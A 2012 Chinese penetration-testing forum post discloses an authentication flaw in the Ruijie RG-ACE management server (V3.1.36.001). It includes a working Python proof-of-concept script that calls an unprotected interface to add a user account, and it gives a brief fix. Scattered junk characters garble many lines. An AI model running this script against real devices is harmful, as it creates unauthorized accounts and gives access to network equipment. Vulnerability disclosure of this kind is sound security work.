找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 锐捷应用控制引擎管理服务器可以增加用户
返回列表 发新帖
查看: 2876|回复: 0
打印 上一主题 下一主题

锐捷应用控制引擎管理服务器可以增加用户

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-10 10:16:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)
8 z1 ^$ Q  G+ f6 m" @# L8 r% P
' c0 `( e+ L% o: u0 ~
1 K$ N9 R) t5 ]6 z/ W7 d测试的具体版本是- c3 R# p5 n$ F7 h2 J" p# W
产品名称: 锐捷应用控制引擎6 ?' T- d# p  V6 ?
版本号: 3.1.36.001 TC9 b* Y! S% Q( G; U
编译时间: 2011042917301 F3 a' B  L0 u0 J8 T& ~1 c8 H
- a' H* ?( h9 I1 x* x: d0 I- y
( W: \2 z; J. b2 A
漏洞证明:9 l0 l( q8 s+ }  J1 C* ]

3 G. S3 F. @/ Z9 [- B  @) t8 I' k" k0 e" x$ a
3 [9 a8 Z+ _4 e" t# u
8 B' ]* s# p* N* c5 p* p6 w

) [# y! K' n3 q3 m% C* g; j9 n. V6 X
执行脚本+ ^5 t( f  C7 k) e0 O# H+ j% _" c. T
#! /usr/bin/env python+ W; a- q9 }$ }4 r3 O
#coding=gbk
" K) c" |. ?* r0 F$ _* C* K8 S. n#RG-ACE管理服务器 V3.1.36.001
$ x8 l& X% X  |% n5 h, @8 yimport urllib2, urllib,cookielib
: m) [& g( V# ?" |6 D( nurl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP& Y! D9 w! _+ p  T5 K; D0 H
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
  F# p' i; q0 q8 c4 A' vopener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]( T. H5 {( w' i# n2 ^2 n+ p
post=(("event","userManager.doInsertUserInfo"),' a2 j; c  E! u+ M' P9 K% _8 y) B6 t
("useractionname","addButtonValue"),5 L- P! w. W" M* T# M
("useropermanager","userManager"),
: o, ^& }' Z7 w, I; S, N("userName","t"), #######账号自己加: _5 `) P% h. k) j/ g/ e
("pwd","aaaaaa"),######密码自己加
- m  H' B2 b4 N, f( a8 o1 p("trueName","ad"),6 K8 K7 k+ v, s2 O8 T6 d6 z5 I$ z
("email",""),8 I$ C0 m4 @: ?  n; F& Q* l/ V* U
("mobilePhone",""),0 U+ O! }9 [" V$ T8 i
("officePhone",""),
1 W- H2 c' k5 V("addr",""),
1 L$ a* ?4 Q; ~& |4 }" V("submit","确定"))
( d; l! R2 T4 Aurllib2.install_opener(opener)
7 |( ^- C) \' O* V$ Zp=urllib2.urlopen(url, urllib.urlencode(post)).read()
8 }4 o/ z/ f5 p7 U" Q3 gprint "Done"! T$ k0 s; C) d  ?

) p& ~+ T' p; x登录,连接设备8 p. m- U% d+ L8 K" B

5 l  u& h9 Q. `# n4 Y5 H2 C$ A' w3 ?* d" P: W
6 w- l7 z% s) r* E9 z
- L& B! K6 x9 E7 M6 ?

" g, r5 |* \1 N7 g: p' P默认的管理员admin权限更大点
$ |6 j9 Y8 K  y( e1 I* |* G
: O1 N4 [% J6 }' }1 d7 b3 A* t* p7 Y! Q2 O8 G  e8 V  d; `! l* Y

) d4 }$ a: J  Q $ A4 a7 T6 _& V  X, }% F) _7 l; O) O

) X1 o& W% n* z' k/ V修复方案:
9 f/ y, F( \+ e' T$ W" [加强对接口的权限验证# w0 X3 P2 S7 e% l$ o7 Z

% x8 L: n' k  k# n+ O
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表